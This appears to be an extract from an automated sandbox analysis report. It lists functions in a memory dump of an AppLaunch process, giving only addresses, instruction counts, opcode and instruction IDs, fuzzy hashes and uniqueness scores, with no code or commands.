                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 6fee0feca97f8c0ee00b3d962f8b6dfb35aabe48b83ba4beaaf7bb78ffe640da
                                                                                                                                                                    • Instruction ID: a33f6a8bd7e38c0f3b4fc98f7f6e6cfb864e0d0131b2ac99c05e97357306ceb0
                                                                                                                                                                    • Opcode Fuzzy Hash: 6fee0feca97f8c0ee00b3d962f8b6dfb35aabe48b83ba4beaaf7bb78ffe640da
                                                                                                                                                                    • Instruction Fuzzy Hash: 08F0A03234463D03DE20169879003FAB28CDB80BE6F05003AFE0EC7790CA4AE80083D1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491336A Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 2fc1c15d9f4baa13bdb78c57a085f2e923e5bb0e579da8158e937bab41f164de
                                                                                                                                                                    • Instruction ID: 829632668ff7959c1e6da43ec05e88ca504780238d054a2e025d0a4ea5b34aef
                                                                                                                                                                    • Opcode Fuzzy Hash: 2fc1c15d9f4baa13bdb78c57a085f2e923e5bb0e579da8158e937bab41f164de
                                                                                                                                                                    • Instruction Fuzzy Hash: 6601BC30901248DFCF40EFB4E59418CBFB1FB85304B2045AED806AB613EA301A06CB51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04917890 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 79e2b36650d3521fa495acc8a4cfe57a885d35ed45f37c7e5b614fe34f7c24e2
                                                                                                                                                                    • Instruction ID: 5c074e5e40873d2edd0aef1975873e8d833e08196a71125a7ba6f392e103545a
                                                                                                                                                                    • Opcode Fuzzy Hash: 79e2b36650d3521fa495acc8a4cfe57a885d35ed45f37c7e5b614fe34f7c24e2
                                                                                                                                                                    • Instruction Fuzzy Hash: 52F0FF347092814FC702A7B899340297FB6EFC224574540FEE945CB393E929AC07C751
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491EF50 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5638e0c82ba2fcf3ae457b680754f51ffeef8fafd67031e6bb541337f3bb7f7a
                                                                                                                                                                    • Instruction ID: caddc29e52eaa6a9a88a6ff637c1dfd47b95ff133006fcc8635ffb46a47f6c5b
                                                                                                                                                                    • Opcode Fuzzy Hash: 5638e0c82ba2fcf3ae457b680754f51ffeef8fafd67031e6bb541337f3bb7f7a
                                                                                                                                                                    • Instruction Fuzzy Hash: B0F0F0326003055FD724EB2AD88492B77EAEBC9264714C83CEE0A8B350EF30BC4187A1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491CBD0 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 86c2b4e837c97637c0c26a9102b2431f859acc7fd032828aa7bcba2aef0b6ba0
                                                                                                                                                                    • Instruction ID: 9abd86d997f3cc2c95fe19fb19e79579bee0ffac47a279e3af3671076775c4b1
                                                                                                                                                                    • Opcode Fuzzy Hash: 86c2b4e837c97637c0c26a9102b2431f859acc7fd032828aa7bcba2aef0b6ba0
                                                                                                                                                                    • Instruction Fuzzy Hash: 1C0169342006158FC754CF29D544D9ABBE6FF84354711C469E5068B731DBB0FD01CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049114B8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5e02fc3ee7b4071fe7d5de3c32c63d8f3adca197e75ea2a128f373d69c30f6d9
                                                                                                                                                                    • Instruction ID: 1332498a19d4157f1199d24ebba606c23d274f204d6d9ace5dfe733ba785e86b
                                                                                                                                                                    • Opcode Fuzzy Hash: 5e02fc3ee7b4071fe7d5de3c32c63d8f3adca197e75ea2a128f373d69c30f6d9
                                                                                                                                                                    • Instruction Fuzzy Hash: 1C0100B4D0421DEFCB04EFA9D4492AEBBF1FB08300F1094AAC906A7290E7345A41CF90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491C138 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8cf85b9d93ae2ad241caf566b097133d04762b4c01ed491139448711d0d6894e
                                                                                                                                                                    • Instruction ID: d3f2c8c88d68e8d2d7f5788f40f1207cfb7f3617d8c641a231ba2c5c2b149b3f
                                                                                                                                                                    • Opcode Fuzzy Hash: 8cf85b9d93ae2ad241caf566b097133d04762b4c01ed491139448711d0d6894e
                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0E272245AA99FC3019B28D810C4A7BB4EF82721319819AE948DB332CB14EE41CBE0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049131F7 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d416933007eb175d47920c2cfd1966e242980981872e6363061efa75da12cd59
                                                                                                                                                                    • Instruction ID: 6d692b2876e25a4c4e672c682528951e2b70e6514233e51ea791c462cc4e7b08
                                                                                                                                                                    • Opcode Fuzzy Hash: d416933007eb175d47920c2cfd1966e242980981872e6363061efa75da12cd59
                                                                                                                                                                    • Instruction Fuzzy Hash: 81F0E2312052D02FC3102AB9A858ADF7FE5DBCA315724406DE60EC3743C9651C06C7B5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491BF38 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c630dddbd2908a8ae3b620c0f39d5ab7b8bbe3734642e02bf1c49bb77fb98a66
                                                                                                                                                                    • Instruction ID: 459b239d4021b20b23761ee0429801332c2c9d44f759c80aacceb1007fdafdc6
                                                                                                                                                                    • Opcode Fuzzy Hash: c630dddbd2908a8ae3b620c0f39d5ab7b8bbe3734642e02bf1c49bb77fb98a66
                                                                                                                                                                    • Instruction Fuzzy Hash: 50F06930A006298BCB50EF68D8185DEBBF0EF88311B00852AE45AE7710DB306A45CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04913378 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 3f4c599b807677772473175a1b7325fd70e5def6408182aa23a968d9f782b06c
                                                                                                                                                                    • Instruction ID: aac3a1a463e2f010a2efa68479bd741771b545e3822b770e1f95ad40ca59918a
                                                                                                                                                                    • Opcode Fuzzy Hash: 3f4c599b807677772473175a1b7325fd70e5def6408182aa23a968d9f782b06c
                                                                                                                                                                    • Instruction Fuzzy Hash: ACF04F30D00249EFCB44EFF8E59555DBFB1FB84304F1044ADD806A7752EA346A45CB55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04917908 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 6b31a04b9c06af55b2dddd417f3c218fc3974fbe5664381cd7a151a5345be962
                                                                                                                                                                    • Instruction ID: 29bc5a3febbe555b2b619f5ef5b0aaba9572dd9ea9206dfbf8e92d6ae2fd200e
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b31a04b9c06af55b2dddd417f3c218fc3974fbe5664381cd7a151a5345be962
                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0F84174D2D14FC71323B928741656FA19E9618678A40FFE2D1CB6A3E948984AD362
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491BF48 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 69034e4d572ac1536e695294aabde5df7e5b67da0782c8afd1a699b75de15bda
                                                                                                                                                                    • Instruction ID: 4837071315efc6ee93ec5d957bb2d43d244d956a0dfdc584a10f20346464d456
                                                                                                                                                                    • Opcode Fuzzy Hash: 69034e4d572ac1536e695294aabde5df7e5b67da0782c8afd1a699b75de15bda
                                                                                                                                                                    • Instruction Fuzzy Hash: 38F04430A006188FCB50EF69D80459EBBF4FF88320B00492AE40AE3310EB70AA06CBD5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491DB3D Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b5756f83f685e258291cfe4d3805a7075fae91e686ec11e77952e4191a6525bf
                                                                                                                                                                    • Instruction ID: d651e66f2dec31c38e6e0b152fb3e2ac05b7d503645fd371a1a2676b59c06f5f
                                                                                                                                                                    • Opcode Fuzzy Hash: b5756f83f685e258291cfe4d3805a7075fae91e686ec11e77952e4191a6525bf
                                                                                                                                                                    • Instruction Fuzzy Hash: C401AF75A45219AFDF01DB90D994FAEBBB2FF48700F108115E802BB2A1D775A940DB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049185BA Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5a84c8780743e463ad3568ad9717d2dafbca0cddb9bf42ca0f7b02ecba464bc6
                                                                                                                                                                    • Instruction ID: 94f081143412a1164d1553bbaa22f77050c81db80b9005b19ecf392a355fc93a
                                                                                                                                                                    • Opcode Fuzzy Hash: 5a84c8780743e463ad3568ad9717d2dafbca0cddb9bf42ca0f7b02ecba464bc6
                                                                                                                                                                    • Instruction Fuzzy Hash: B9E068313047585BCB0A623A6C1096A7B9E9EC269230844FADA04C7251FF20D80283E0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04914130 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 69a4d23b578a625cd2d5efb78e5912c2d2650654d46953e54548539474c07d83
                                                                                                                                                                    • Instruction ID: bbf5a7e79af929c6babed931d21ce61f4edbe5b0c0e2d257c4f6d0172aff2dea
                                                                                                                                                                    • Opcode Fuzzy Hash: 69a4d23b578a625cd2d5efb78e5912c2d2650654d46953e54548539474c07d83
                                                                                                                                                                    • Instruction Fuzzy Hash: 44F0B431105BA18FC711A738E45434B7FE1EF86309F09456ED2868BA52D7696806CBA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491BED7 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a22792ffc977dad69ac0582debfc3bd35b9c74d199879115bdad91fcad07b9b2
                                                                                                                                                                    • Instruction ID: 888ee633e9ec60bbcb29dcef42fe38640fd19770301e8ddc15222567cc60594b
                                                                                                                                                                    • Opcode Fuzzy Hash: a22792ffc977dad69ac0582debfc3bd35b9c74d199879115bdad91fcad07b9b2
                                                                                                                                                                    • Instruction Fuzzy Hash: E8F0A3352001445BD714277DB444A9A7B95EFC631C750417CE50E87307CB790C07CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049131B1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d00c8285bc3659e1826c7d1d5a9b0a5de3dd76d889d5de56e069fc658b35783f
                                                                                                                                                                    • Instruction ID: 0c50a085c0c8a5f3a5c7009fc8ccc227694ecb29047080e8b00388906a7cd362
                                                                                                                                                                    • Opcode Fuzzy Hash: d00c8285bc3659e1826c7d1d5a9b0a5de3dd76d889d5de56e069fc658b35783f
                                                                                                                                                                    • Instruction Fuzzy Hash: 87E022312005A00BC71223A8A5185ED3FA6EAE2216304002DE503CB753CE69080647B5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491C148 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f7d2ba15240bcb590844c309f95292509bf32a36be6f8baef9e7b614555cab8f
                                                                                                                                                                    • Instruction ID: 8aeb91a8be5466f142caa50063269bde7f755dfaab0f8b73f90dbde703ea9645
                                                                                                                                                                    • Opcode Fuzzy Hash: f7d2ba15240bcb590844c309f95292509bf32a36be6f8baef9e7b614555cab8f
                                                                                                                                                                    • Instruction Fuzzy Hash: E9F0E5323019659FC3109F28D400C4EBBA9EF85B203058169E80997331CB24FD41CBD0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04913208 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9c5b0a960fefab7517183ac460f3fc1bc4f617c7c90112ffb2707723dea97c1b
                                                                                                                                                                    • Instruction ID: 7034601c445b391e5cd93f93856d77678e1a5fbbd9344aadbc4c1001ee055cd2
                                                                                                                                                                    • Opcode Fuzzy Hash: 9c5b0a960fefab7517183ac460f3fc1bc4f617c7c90112ffb2707723dea97c1b
                                                                                                                                                                    • Instruction Fuzzy Hash: 5AE092313002946BD3142AEAA948A9F7AD9DBCA315B00443CF60EC3B43DE652C45C7B5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049141A0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: bf51a25da6d4ab731d012c86d2620237f348e50e293a1018c4791b7318305141
                                                                                                                                                                    • Instruction ID: 89f52f0867044c553ff4baab0316808e5e4060edf125a5e6bc1ee8063a9c2158
                                                                                                                                                                    • Opcode Fuzzy Hash: bf51a25da6d4ab731d012c86d2620237f348e50e293a1018c4791b7318305141
                                                                                                                                                                    • Instruction Fuzzy Hash: 70F03070501B058FD724DFA6E548656BBF6FF88315B00C52EE84B82E62DB74B54ACF84
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491BEE8 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0505cdb392f1f9d3da53509e96a47595c50e751d52e02a5b05df8777fe4cfb71
                                                                                                                                                                    • Instruction ID: 64b6aff353604b8b5e0cc7c2ca7b109248d3bcfd92a7c8e61ed0447475361226
                                                                                                                                                                    • Opcode Fuzzy Hash: 0505cdb392f1f9d3da53509e96a47595c50e751d52e02a5b05df8777fe4cfb71
                                                                                                                                                                    • Instruction Fuzzy Hash: 34E02636300218A7D71477BAB80885BBA9EDBCA229740843DFA0EC3302DE7D5C0183B5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04914140 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d7a23fb70ea6ee34a8d3aa370b18e5299b967f9c5b18146d2e89082a77910b59
                                                                                                                                                                    • Instruction ID: 6e62e1f4d136851de9ee8d5884bd1598558af940e30290f178d6ec8d070106ff
                                                                                                                                                                    • Opcode Fuzzy Hash: d7a23fb70ea6ee34a8d3aa370b18e5299b967f9c5b18146d2e89082a77910b59
                                                                                                                                                                    • Instruction Fuzzy Hash: 78E065311007658BC710A769E44475B7FE6EFC5319F04482DE24787B52DBBAA806CBD5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491B080 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d5092cc8dd4c901f78cdd421fcf02d3b207d23b98b1a9a5a213806fe5b555521
                                                                                                                                                                    • Instruction ID: 49d653d90ef2a6df102af2a95829520677e4510559bc268f3aa89db473646687
                                                                                                                                                                    • Opcode Fuzzy Hash: d5092cc8dd4c901f78cdd421fcf02d3b207d23b98b1a9a5a213806fe5b555521
                                                                                                                                                                    • Instruction Fuzzy Hash: D6E086716042544FCB11EA749D285C53FA9EE0620235150E6E905DB362DA21ED05C7B2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04910470 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 3e51df180f554f8e55654319e0c36ec20afc7b4be48299c4d9d97c6bbac378da
                                                                                                                                                                    • Instruction ID: ab2d1f54ff491a9635779c292812f3f7be410e059418a5c1baa360c450a9a708
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e51df180f554f8e55654319e0c36ec20afc7b4be48299c4d9d97c6bbac378da
                                                                                                                                                                    • Instruction Fuzzy Hash: A2E0ED3080A248EFC700EFB4F50525D7FB0EB81308F1044FAC8059B251FB351E099B82
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491B260 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c3ddd8c7af65cc2636ac284b8b9d96df8e7a606691a7c5468b4c75f4560dacfd
                                                                                                                                                                    • Instruction ID: 48cfda23add2b324c7313cba0fa944c17ec9dca04673f4e77f0848f7e79cb37f
                                                                                                                                                                    • Opcode Fuzzy Hash: c3ddd8c7af65cc2636ac284b8b9d96df8e7a606691a7c5468b4c75f4560dacfd
                                                                                                                                                                    • Instruction Fuzzy Hash: 72E02B7294D3205F8B02D7A458201DE3FE649A536171101D7C44CDB291D825090243E4
                                                                                                                                                                    Uniqueness

